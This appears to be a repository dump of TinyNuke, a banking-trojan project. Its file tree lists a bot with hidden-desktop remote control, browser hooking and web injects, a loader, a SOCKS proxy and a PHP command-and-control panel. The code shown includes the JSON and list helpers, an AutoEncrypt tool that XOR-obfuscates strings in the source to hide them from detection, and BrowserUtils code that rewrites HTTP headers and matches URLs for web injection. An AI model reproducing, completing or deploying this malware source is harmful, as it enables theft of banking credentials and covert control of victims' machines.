├── .gitattributes ├── .gitignore ├── .vs └── TinyNuke │ └── v14 │ └── .suo ├── AiJson ├── AiJson.cpp ├── AiJson.h ├── AiList.cpp ├── AiList.h ├── AiStrAppender.cpp └── AiStrAppender.h ├── Api.cpp ├── Api.h ├── AutoEncrypt.exe ├── AutoEncrypt ├── AutoEncrypt.sln ├── AutoEncrypt.v11.suo └── AutoEncrypt │ ├── App.config │ ├── AutoEncrypt.csproj │ ├── AutoEncrypt.csproj.user │ ├── Program.cs │ └── Properties │ └── AssemblyInfo.cs ├── Bot ├── Bot.cpp ├── Bot.h ├── Bot.vcxproj ├── Bot.vcxproj.filters ├── Bot.vcxproj.user ├── BrowserUtils.cpp ├── BrowserUtils.h ├── Explorer.cpp ├── Explorer.h ├── FirefoxChrome.cpp ├── FirefoxChrome.h ├── HiddenDesktop.cpp ├── HiddenDesktop.h ├── IE.cpp ├── IE.h ├── Main.cpp ├── Socks.cpp ├── Socks.h ├── WebInjects.cpp └── WebInjects.h ├── Common.h ├── CreateDllInjectPayload └── CreateDllInjectPayload.cpp ├── HTTP.cpp ├── HTTP.h ├── HiddenDesktop ├── HiddenDesktop.sdf ├── HiddenDesktop.sln ├── HiddenDesktop.v11.suo ├── Server │ ├── Common.h │ ├── ControlWindow.cpp │ ├── ControlWindow.h │ ├── Main.cpp │ ├── Server.cpp │ ├── Server.h │ ├── Server.vcxproj │ ├── Server.vcxproj.filters │ └── Server.vcxproj.user └── readme.txt ├── Inject.cpp ├── Inject.h ├── Loader ├── Loader.vcxproj ├── Loader.vcxproj.filters ├── Loader.vcxproj.user └── Main.cpp ├── MinHook ├── include │ └── MinHook.h └── src │ ├── buffer.c │ ├── buffer.h │ ├── hde │ ├── hde32.c │ ├── hde32.h │ ├── hde64.c │ ├── hde64.h │ ├── pstdint.h │ ├── table32.h │ └── table64.h │ ├── hook.c │ ├── trampoline.c │ └── trampoline.h ├── Panel.cpp ├── Panel.h ├── README.md ├── SocksServer ├── SocksServer.sdf ├── SocksServer.sln ├── SocksServer.v11.suo └── SocksServer │ ├── Server.cpp │ ├── Server.h │ ├── SocksServer.vcxproj │ ├── SocksServer.vcxproj.filters │ ├── SocksServer.vcxproj.user │ └── main.cpp ├── TinyNuke.VC.db ├── TinyNuke.sdf ├── TinyNuke.sln ├── TinyNuke.v11.suo ├── Utils.cpp ├── Utils.h ├── enc.cmd ├── panel ├── bots.php ├── client.php ├── commands.php ├── db.sql ├── geoip.dat ├── inc │ ├── cc.php │ ├── common.php │ ├── const.php │ ├── db.php │ ├── geoip.php │ ├── ui.php │ └── utils.php ├── index.php ├── login.php ├── pinned_hosts.php ├── private │ ├── .htaccess │ └── injects.json ├── reports.php ├── settings.php ├── settings_data.php └── style │ └── style.css └── wow64ext ├── CMemPtr.h ├── internal.h ├── resource.h ├── wow64ext.cpp ├── wow64ext.dll ├── wow64ext.h └── wow64ext.lib /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Windows image file caches 2 | Thumbs.db 3 | ehthumbs.db 4 | 5 | # Folder config file 6 | Desktop.ini 7 | 8 | # Recycle Bin used on file shares 9 | $RECYCLE.BIN/ 10 | 11 | # Windows Installer files 12 | *.cab 13 | *.msi 14 | *.msm 15 | *.msp 16 | 17 | # Windows shortcuts 18 | *.lnk 19 | 20 | # ========================= 21 | # Operating System Files 22 | # ========================= 23 | 24 | # OSX 25 | # ========================= 26 | 27 | .DS_Store 28 | .AppleDouble 29 | .LSOverride 30 | 31 | # Thumbnails 32 | ._* 33 | 34 | # Files that might appear in the root of a volume 35 | .DocumentRevisions-V100 36 | .fseventsd 37 | .Spotlight-V100 38 | .TemporaryItems 39 | .Trashes 40 | .VolumeIcon.icns 41 | 42 | # Directories potentially created on remote AFP share 43 | .AppleDB 44 | .AppleDesktop 45 | Network Trash Folder 46 | Temporary Items 47 | .apdisk 48 | -------------------------------------------------------------------------------- /.vs/TinyNuke/v14/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/.vs/TinyNuke/v14/.suo -------------------------------------------------------------------------------- /AiJson/AiJson.h: -------------------------------------------------------------------------------- 1 | #ifndef AI_JSON_H 2 | #define AI_JSON_H 3 | 4 | #include "AiList.h" 5 | 6 | typedef struct AiJsonObjectField AiJsonObjectField; 7 | typedef struct AiJsonValue AiJsonValue; 8 | typedef struct AiJsonArray AiJsonArray; 9 | typedef struct AiJson AiJson; 10 | typedef enum AiJsonType AiJsonType; 11 | typedef enum AiJsonError AiJsonError; 12 | 13 | enum AiJsonType 14 | { 15 | AI_JSON_STRING, 16 | AI_JSON_DOUBLE, 17 | AI_JSON_ULONG, 18 | AI_JSON_SLONG, 19 | AI_JSON_OBJECT, 20 | AI_JSON_ARRAY, 21 | AI_JSON_BOOL, 22 | AI_JSON_NULL 23 | }; 24 | 25 | //do not reorder 26 | enum AiJsonError 27 | { 28 | AI_JSON_E_OK, 29 | AI_JSON_E_UNEXPECTED_SYMBOL, 30 | AI_JSON_E_UNEXPECTED_EOF, 31 | AI_JSON_E_INVALID_HEX_DIGIT, 32 | AI_JSON_E_INVALID_ESCAPE_SEQUENCE, 33 | AI_JSON_E_CHAR_MUST_BE_ESCAPED, 34 | AI_JSON_E_INVALID_NUM, 35 | AI_JSON_E_EXPECTED_ARRAY_CLOSE, 36 | AI_JSON_E_EXPECTED_NAME, 37 | AI_JSON_E_EXPECTED_NAME_SEPARATOR, 38 | AI_JSON_E_EXPECTED_OBJECT_CLOSE, 39 | AI_JSON_E_UNKNOWN, 40 | AI_JSON_E_ALLOC, 41 | AI_JSON_E_INVALID_VALUE, 42 | }; 43 | 44 | struct AiJsonValue 45 | { 46 | AiJsonType type; 47 | union 48 | { 49 | char *string; 50 | long sLong; 51 | unsigned long uLong; 52 | double dbl; 53 | AiList *array; 54 | AiList *object; 55 | int boolean; 56 | } data; 57 | }; 58 | 59 | struct AiJsonObjectField 60 | { 61 | char *name; 62 | AiJsonValue value; 63 | }; 64 | 65 | struct AiJson 66 | { 67 | AiJsonValue root; 68 | AiJsonError error; 69 | char *errorMsg; 70 | size_t line; 71 | size_t column; 72 | struct 73 | { 74 | AiList *mallocList; 75 | AiList *listList; 76 | } _private; 77 | }; 78 | 79 | AiJson *AiJsonParse(char *str); 80 | void AiJsonDestroy(AiJson *json); 81 | char *AiJsonDump(AiJson *json, int spaces); 82 | 83 | AiJsonValue *AiJsonGetValueObject(AiList *object, char *name); 84 | void AiJsonRemoveValueObject(AiList *object, char *name); 85 | int AiJsonInsertValueObject(AiJson *json, AiList *object, char *name, AiJsonValue *value); 86 | 87 | AiJsonValue *AiJsonGetValueArray(AiList *array, size_t index); 88 | void AiJsonRemoveValueArray(AiList *array, size_t index); 89 | int AiJsonInsertValueArray(AiJson *json, AiList *array, AiJsonValue *value); 90 | 91 | #endif -------------------------------------------------------------------------------- /AiJson/AiList.cpp: -------------------------------------------------------------------------------- 1 | #include "..\Common.h" 2 | #include 3 | #include 4 | #include 5 | #include "AiList.h" 6 | 7 | AiList *AiListCreate() 8 | { 9 | AiList *list = (AiList *) Alloc(sizeof(*list)); 10 | if(!list) 11 | return 0; 12 | Funcs::pMemset(list, 0, sizeof(*list)); 13 | return list; 14 | } 15 | 16 | int AiListInsert(AiList *list, void *data) 17 | { 18 | AiListNode *node; 19 | if(!list) 20 | return 0; 21 | node = (AiListNode *) Alloc(sizeof(*node)); 22 | if(!node) 23 | return 0; 24 | Funcs::pMemset(node, 0, sizeof(*node)); 25 | node->data = data; 26 | if(!list->first) 27 | { 28 | list->first = node; 29 | list->last = node; 30 | } 31 | else 32 | { 33 | list->last->next = node; 34 | node->prev = list->last; 35 | list->last = node; 36 | } 37 | ++list->len; 38 | return 1; 39 | } 40 | 41 | void AiListRemove(AiList *list, AiListNode *node) 42 | { 43 | if(!list) 44 | return; 45 | if(!node) 46 | return; 47 | if(node->prev) 48 | { 49 | node->prev->next = node->next; 50 | if(list->last == node) 51 | list->last = list->last->prev; 52 | } 53 | if(node->next) 54 | node->next->prev = node->prev; 55 | Funcs::pFree(node); 56 | --list->len; 57 | } 58 | 59 | void AiListDestroy(AiList *list) 60 | { 61 | AiListNode *curr = list->first; 62 | if(!list) 63 | return; 64 | while(curr) 65 | { 66 | AiListNode *kill = curr; 67 | curr = curr->next; 68 | Funcs::pFree(kill); 69 | } 70 | Funcs::pFree(list); 71 | list = 0; 72 | } -------------------------------------------------------------------------------- /AiJson/AiList.h: -------------------------------------------------------------------------------- 1 | #ifndef AI_LIST_H 2 | #define AI_LIST_H 3 | 4 | #include 5 | 6 | typedef struct AiList AiList; 7 | typedef struct AiListNode AiListNode; 8 | 9 | struct AiList 10 | { 11 | AiListNode *first; 12 | AiListNode *last; 13 | size_t len; 14 | }; 15 | 16 | struct AiListNode 17 | { 18 | AiListNode *prev; 19 | AiListNode *next; 20 | void *data; 21 | }; 22 | 23 | AiList *AiListCreate(); 24 | int AiListInsert(AiList *list, void *data); 25 | void AiListRemove(AiList *list, AiListNode *node); 26 | void AiListDestroy(AiList *list); 27 | 28 | #endif -------------------------------------------------------------------------------- /AiJson/AiStrAppender.cpp: -------------------------------------------------------------------------------- 1 | #ifdef _MSC_VER 2 | #define _CRT_SECURE_NO_WARNINGS 3 | #endif 4 | 5 | #include "..\Common.h" 6 | #include 7 | #include 8 | #include 9 | #include "AiStrAppender.h" 10 | 11 | #define STR_GROW_SIZE 512 12 | 13 | int AiStrAppenderInit(AiStrAppender *strAppender) 14 | { 15 | if(!strAppender) 16 | return 0; 17 | strAppender->allocSize = STR_GROW_SIZE; 18 | strAppender->strSize = 0; 19 | strAppender->str = (char *) Alloc(strAppender->allocSize + 1); 20 | *strAppender->str = 0; 21 | if(!strAppender->str) 22 | return 0; 23 | return 1; 24 | } 25 | 26 | int AiStrAppenderWorkChar(AiStrAppender *strAppender, char toAppend) 27 | { 28 | char str[2]; 29 | str[0] = toAppend; 30 | str[1] = 0; 31 | return AiStrAppenderWork(strAppender, str); 32 | } 33 | 34 | int AiStrAppenderWork(AiStrAppender *strAppender, char *toAppend) 35 | { 36 | size_t toAppendSize = Funcs::pLstrlenA(toAppend); 37 | if(toAppendSize == 0) 38 | return 1; 39 | if(!strAppender || !toAppend) 40 | return 0; 41 | strAppender->strSize += toAppendSize; 42 | if(strAppender->strSize > strAppender->allocSize) 43 | { 44 | void *mem; 45 | strAppender->allocSize += STR_GROW_SIZE; 46 | mem = ReAlloc(strAppender->str, strAppender->allocSize + 1); 47 | if(!mem) 48 | return 0; 49 | strAppender->str = (char *) mem; 50 | } 51 | Funcs::pLstrcatA(strAppender->str, toAppend); 52 | return 1; 53 | } -------------------------------------------------------------------------------- /AiJson/AiStrAppender.h: -------------------------------------------------------------------------------- 1 | #ifndef AI_STR_APPENDER 2 | #define AI_LIST_APPENDER 3 | 4 | #include 5 | 6 | typedef struct AiStrAppender AiStrAppender; 7 | 8 | struct AiStrAppender 9 | { 10 | char *str; 11 | size_t strSize; 12 | size_t allocSize; 13 | }; 14 | 15 | int AiStrAppenderInit(AiStrAppender *strAppender); 16 | int AiStrAppenderWork(AiStrAppender *strAppender, char *toAppend); 17 | int AiStrAppenderWorkChar(AiStrAppender *strAppender, char toAppend); 18 | 19 | #endif -------------------------------------------------------------------------------- /AutoEncrypt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/AutoEncrypt.exe -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AutoEncrypt", "AutoEncrypt\AutoEncrypt.csproj", "{864F1D11-1809-4054-B8D0-1FBB51BD2BA1}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Any CPU = Debug|Any CPU 9 | Release|Any CPU = Release|Any CPU 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {864F1D11-1809-4054-B8D0-1FBB51BD2BA1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 13 | {864F1D11-1809-4054-B8D0-1FBB51BD2BA1}.Debug|Any CPU.Build.0 = Debug|Any CPU 14 | {864F1D11-1809-4054-B8D0-1FBB51BD2BA1}.Release|Any CPU.ActiveCfg = Release|Any CPU 15 | {864F1D11-1809-4054-B8D0-1FBB51BD2BA1}.Release|Any CPU.Build.0 = Release|Any CPU 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt.v11.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/AutoEncrypt/AutoEncrypt.v11.suo -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt/AutoEncrypt.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {864F1D11-1809-4054-B8D0-1FBB51BD2BA1} 8 | Exe 9 | Properties 10 | AutoEncrypt 11 | AutoEncrypt 12 | v4.5 13 | 512 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 59 | -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt/AutoEncrypt.csproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | C:\Users\User\Documents\test.txt 5 | 6 | -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | 8 | namespace AutoEncrypt 9 | { 10 | class Program 11 | { 12 | private static String EncStr(String str, String key) 13 | { 14 | String enc = ""; 15 | for(int i = 0; i < str.Length; ++i) 16 | { 17 | int code = str[i] ^ key[i % key.Length]; 18 | enc += "\\x" + code.ToString("X4"); 19 | } 20 | return enc; 21 | } 22 | 23 | private static Random random = new Random(); 24 | private static string RandomString(int length) 25 | { 26 | const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; 27 | return new string(Enumerable.Repeat(chars, length) 28 | .Select(s => s[random.Next(s.Length)]).ToArray()); 29 | } 30 | 31 | static void Main(string[] args) 32 | { 33 | try 34 | { 35 | const String startEncA = "ENC_STR_A"; 36 | const String endEnc = "END_ENC_STR"; 37 | const int maxKeyLen = 128; 38 | String source = File.ReadAllText(args[0]); 39 | File.WriteAllText(args[0], ""); 40 | StreamWriter writer = File.AppendText(args[0]); 41 | for(;;) 42 | { 43 | int indexStart; 44 | if((indexStart = source.IndexOf(startEncA)) == -1) 45 | break; 46 | 47 | writer.Write(source.Substring(0, indexStart)); 48 | 49 | int indexEnd; 50 | if((indexEnd = source.IndexOf(endEnc)) == -1) 51 | break; 52 | 53 | String str2enc = source.Substring(indexStart + startEncA.Length + 1, indexEnd - indexStart - endEnc.Length); 54 | Console.WriteLine(str2enc); 55 | 56 | str2enc = System.Text.RegularExpressions.Regex.Unescape(str2enc); 57 | int len = str2enc.Length; 58 | 59 | source = source.Substring(indexEnd + endEnc.Length); 60 | 61 | String key = RandomString((str2enc.Length < maxKeyLen) ? str2enc.Length : maxKeyLen); 62 | str2enc = EncStr(str2enc, key); 63 | 64 | writer.Write("UnEnc(\"" + str2enc + "\", \"" + key + "\", " + len + ")"); 65 | } 66 | writer.Write(source); 67 | writer.Close(); 68 | } 69 | catch(Exception e) 70 | { 71 | Console.WriteLine(e.ToString()); 72 | } 73 | Console.ReadKey(); 74 | } 75 | } 76 | } -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("AutoEncrypt")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("Microsoft")] 12 | [assembly: AssemblyProduct("AutoEncrypt")] 13 | [assembly: AssemblyCopyright("Copyright © Microsoft 2016")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("e736e834-adb0-484e-ba3b-0aade648dd30")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Bot/Bot.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "..\Common.h" 3 | void StartBot(); -------------------------------------------------------------------------------- /Bot/Bot.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {02973c9f-658a-4cd8-b6a3-ff57a4a50778} 18 | 19 | 20 | {080297bb-d59c-4cb0-ad15-943361adca8a} 21 | 22 | 23 | {233dee48-2e2c-4291-b51f-b42b5c9adfbd} 24 | 25 | 26 | {2e345b9a-fd26-4f80-ba3d-ba790eea1a07} 27 | 28 | 29 | {87621f0f-b199-4ead-af5b-19ff85b463b3} 30 | 31 | 32 | {f210c39b-ed90-4936-89d9-52c86de3cd15} 33 | 34 | 35 | 36 | 37 | Source Files 38 | 39 | 40 | Source Files 41 | 42 | 43 | Source Files 44 | 45 | 46 | Source Files 47 | 48 | 49 | Source Files 50 | 51 | 52 | Source Files\wow64ext 53 | 54 | 55 | Source Files 56 | 57 | 58 | Source Files\MinHook 59 | 60 | 61 | Source Files\MinHook 62 | 63 | 64 | Source Files\MinHook 65 | 66 | 67 | Source Files\MinHook 68 | 69 | 70 | Source Files\MinHook 71 | 72 | 73 | Source Files 74 | 75 | 76 | Source Files 77 | 78 | 79 | Source Files 80 | 81 | 82 | Source Files 83 | 84 | 85 | Source Files 86 | 87 | 88 | Source Files\AiJson 89 | 90 | 91 | Source Files\AiJson 92 | 93 | 94 | Source Files\AiJson 95 | 96 | 97 | Source Files 98 | 99 | 100 | Source Files 101 | 102 | 103 | Source Files 104 | 105 | 106 | 107 | 108 | Header Files 109 | 110 | 111 | Header Files 112 | 113 | 114 | Header Files 115 | 116 | 117 | Header Files 118 | 119 | 120 | Header Files 121 | 122 | 123 | Header Files 124 | 125 | 126 | Header Files\wow64ext 127 | 128 | 129 | Header Files\wow64ext 130 | 131 | 132 | Header Files\wow64ext 133 | 134 | 135 | Header Files\wow64ext 136 | 137 | 138 | Header Files 139 | 140 | 141 | Header Files\MinHook 142 | 143 | 144 | Header Files\MinHook 145 | 146 | 147 | Header Files\MinHook 148 | 149 | 150 | Header Files\MinHook 151 | 152 | 153 | Header Files\MinHook 154 | 155 | 156 | Header Files\MinHook 157 | 158 | 159 | Header Files\MinHook 160 | 161 | 162 | Header Files\MinHook 163 | 164 | 165 | Header Files 166 | 167 | 168 | Header Files 169 | 170 | 171 | Header Files 172 | 173 | 174 | Header Files 175 | 176 | 177 | Header Files 178 | 179 | 180 | Header Files 181 | 182 | 183 | Header Files\AiJson 184 | 185 | 186 | Header Files\AiJson 187 | 188 | 189 | Header Files\AiJson 190 | 191 | 192 | Header Files 193 | 194 | 195 | -------------------------------------------------------------------------------- /Bot/Bot.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Bot/BrowserUtils.cpp: -------------------------------------------------------------------------------- 1 | #include "BrowserUtils.h" 2 | #include "..\Panel.h" 3 | #include "WebInjects.h" 4 | 5 | char *FindStrSandwich(char *buf, char *leftPart, char *rightPart) 6 | { 7 | char *startStrPos = Funcs::pStrStrIA(buf, leftPart); 8 | if(!startStrPos) 9 | return NULL; 10 | startStrPos += Funcs::pLstrlenA(leftPart); 11 | char *endStrPos = Funcs::pStrStrIA(startStrPos, rightPart); 12 | if(!endStrPos) 13 | return NULL; 14 | DWORD strSize = endStrPos - startStrPos; 15 | char *str = (char *) Alloc(strSize + 1); 16 | str[strSize] = 0; 17 | Funcs::pMemcpy(str, startStrPos, strSize); 18 | return str; 19 | } 20 | 21 | char ToLowerOrIgnore(char c, BOOL toLower) 22 | { 23 | return toLower ? Funcs::pTolower(c) : c; 24 | } 25 | 26 | char StrNcmpOrI(const char *str, const char* str2, DWORD maxCount, BOOL ignoreCase) 27 | { 28 | if(ignoreCase) 29 | return Funcs::pStrnicmp(str, str2, maxCount); 30 | else 31 | return Funcs::pStrncmp(str, str2, maxCount); 32 | } 33 | 34 | DWORD WildCardStrCmp(char *str, char *str2, BOOL ignoreCase, BOOL checkEnd) 35 | { 36 | if(!str || !str2) 37 | return FALSE; 38 | 39 | const char wildCardChar = '*'; 40 | 41 | DWORD strLen = Funcs::pLstrlenA(str); 42 | DWORD str2Len = Funcs::pLstrlenA(str2); 43 | 44 | BOOL wildCard = FALSE; 45 | BOOL matched = TRUE; 46 | 47 | PCHAR strAfterWildCard = 0; 48 | DWORD strAfterWildCardLen; 49 | 50 | DWORD i2 = 0; 51 | for(DWORD i = 0; i < strLen || wildCard;) 52 | { 53 | if(wildCard) 54 | { 55 | if(i2 == str2Len) 56 | return FALSE; 57 | if(!StrNcmpOrI(str2 + i2, strAfterWildCard, strAfterWildCardLen, ignoreCase)) 58 | { 59 | wildCard = FALSE; 60 | matched = TRUE; 61 | i2 += strAfterWildCardLen; 62 | } 63 | else 64 | ++i2; 65 | } 66 | else 67 | { 68 | if(str[i] == wildCardChar) 69 | { 70 | if(i + 1 == strLen) 71 | return str2Len; 72 | 73 | char *nextWildCard = Funcs::pStrChrA((char *) str + i + 1, wildCardChar); 74 | if(!nextWildCard) 75 | { 76 | strAfterWildCard = (char *) str + i + 1; 77 | strAfterWildCardLen = strLen - i - 1; 78 | } 79 | else 80 | { 81 | strAfterWildCard = (char *) str + i + 1; 82 | strAfterWildCardLen = (nextWildCard - str) - i - 1; 83 | } 84 | i += strAfterWildCardLen + 1; 85 | wildCard = TRUE; 86 | matched = FALSE; 87 | } 88 | else 89 | { 90 | if(ToLowerOrIgnore(str[i], ignoreCase) != ToLowerOrIgnore(str2[i2], ignoreCase)) 91 | return FALSE; 92 | ++i; 93 | ++i2; 94 | } 95 | } 96 | } 97 | if(i2 != str2Len && checkEnd) 98 | return FALSE; 99 | 100 | return matched ? i2 : FALSE; 101 | } 102 | 103 | DWORD WildCardStrStr(char *str, char *subStr, char **start) 104 | { 105 | if(!str || !subStr) 106 | return FALSE; 107 | 108 | DWORD strLen = Funcs::pLstrlenA(str); 109 | for(DWORD i = 0; i < strLen; ++i) 110 | { 111 | DWORD len = WildCardStrCmp(subStr, str + i, TRUE, FALSE); 112 | if(len) 113 | { 114 | *start = str + i; 115 | return len; 116 | } 117 | } 118 | return FALSE; 119 | } 120 | 121 | BOOL ReplaceHeader(char **headers, char *name, char *value) 122 | { 123 | if(!name || !value || !headers) 124 | return FALSE; 125 | char subStr[255] = { 0 }; 126 | Funcs::pWsprintfA(subStr, Strs::bu1, name); 127 | DWORD headersSize = Funcs::pLstrlenA(*headers); 128 | DWORD valueSize = Funcs::pLstrlenA(value); 129 | DWORD nameSize = Funcs::pLstrlenA(name); 130 | char *start; 131 | DWORD size = WildCardStrStr(*headers, subStr, &start); 132 | DWORD allocatedSize = headersSize + valueSize + nameSize + 10; 133 | 134 | char *newHeaders = (char *) Alloc(allocatedSize); 135 | if(!newHeaders) 136 | return FALSE; 137 | Funcs::pMemset(newHeaders, 0, allocatedSize); 138 | DWORD offset; 139 | DWORD beforeHeaderPosSize; 140 | if(size) 141 | { 142 | size -= 2; 143 | start += 2; 144 | beforeHeaderPosSize = start - *headers; 145 | offset = beforeHeaderPosSize; 146 | Funcs::pMemcpy(newHeaders, *headers, offset); 147 | } 148 | else 149 | { 150 | offset = headersSize - 2; 151 | Funcs::pMemcpy(newHeaders, *headers, offset); 152 | } 153 | Funcs::pMemcpy(newHeaders + offset, name, nameSize); 154 | offset += nameSize; 155 | Funcs::pMemcpy(newHeaders + offset, Strs::bu2, 2); 156 | offset += 2; 157 | Funcs::pMemcpy(newHeaders + offset, value, valueSize); 158 | offset += valueSize; 159 | if(size) 160 | { 161 | Funcs::pMemcpy(newHeaders + offset, Strs::winNewLine, 2); 162 | offset += 2; 163 | Funcs::pMemcpy(newHeaders + offset, *headers + beforeHeaderPosSize + size, headersSize - beforeHeaderPosSize - size); 164 | } 165 | else 166 | Funcs::pMemcpy(newHeaders + offset, Strs::headersEnd, 4); 167 | Funcs::pFree(*headers); 168 | *headers = newHeaders; 169 | return TRUE; 170 | } 171 | 172 | BOOL ReplaceBeforeAfter(char **str2replace, char *strBeforeAfter, char *strReplaceBefore, char *strReplaceAfter) 173 | { 174 | if (!*str2replace || !strBeforeAfter || !strReplaceBefore || !strReplaceAfter) 175 | return FALSE; 176 | 177 | char *startStrBeforeAfter; 178 | DWORD strBeforeAfterLen = WildCardStrStr(*str2replace, strBeforeAfter, &startStrBeforeAfter); 179 | if (!strBeforeAfterLen) 180 | return FALSE; 181 | 182 | DWORD str2replaceLen = Funcs::pLstrlenA(*str2replace); 183 | DWORD strReplaceBeforeLen = Funcs::pLstrlenA(strReplaceBefore); 184 | DWORD strReplaceAfterLen = Funcs::pLstrlenA(strReplaceAfter); 185 | 186 | char *newStr = (char *) Alloc(str2replaceLen + strReplaceBeforeLen + strReplaceAfterLen + 1); 187 | if (!newStr) 188 | return FALSE; 189 | Funcs::pMemset(newStr, 0, str2replaceLen + strReplaceBeforeLen + strReplaceAfterLen + 1); 190 | 191 | DWORD offset = startStrBeforeAfter - *str2replace; 192 | Funcs::pMemcpy(newStr, *str2replace, offset); 193 | 194 | Funcs::pMemcpy(newStr + offset, strReplaceBefore, strReplaceBeforeLen); 195 | offset += strReplaceBeforeLen; 196 | 197 | Funcs::pMemcpy(newStr + offset, startStrBeforeAfter, strBeforeAfterLen); 198 | offset += strBeforeAfterLen; 199 | 200 | Funcs::pMemcpy(newStr + offset, strReplaceAfter, strReplaceAfterLen); 201 | offset += strReplaceAfterLen; 202 | 203 | Funcs::pMemcpy(newStr + offset, startStrBeforeAfter + strBeforeAfterLen, 204 | str2replaceLen - (startStrBeforeAfter - *str2replace) - strBeforeAfterLen); 205 | 206 | Funcs::pFree(*str2replace); 207 | *str2replace = newStr; 208 | return TRUE; 209 | } 210 | 211 | inline char *GetPath(char *headers) 212 | { 213 | return FindStrSandwich(headers, " ", " "); 214 | } 215 | 216 | inline char *GetHost(char *headers) 217 | { 218 | return FindStrSandwich(headers, Strs::bu3, Strs::winNewLine); 219 | } 220 | 221 | char *GetUrlHeaders(char *headers, BOOL *inject) 222 | { 223 | char *host = NULL, *path = NULL, *url = NULL; 224 | if((host = GetHost(headers))) 225 | { 226 | if((path = GetPath(headers))) 227 | url = GetUrlHostPath(host, path, inject); 228 | } 229 | Funcs::pFree(host); 230 | Funcs::pFree(path); 231 | return url; 232 | } 233 | 234 | char *GetUrlHostPath(char *host, char *path, BOOL *inject) 235 | { 236 | *inject = GetWebInject(host, NULL) != NULL; 237 | char *url = NULL; 238 | if(url = (char *) Alloc(lstrlenA(host) + lstrlenA(path) + 20)) 239 | { 240 | Funcs::pLstrcpyA(url, Strs::bu4); 241 | Funcs::pLstrcatA(url, host); 242 | Funcs::pLstrcatA(url, path); 243 | } 244 | return url; 245 | } 246 | 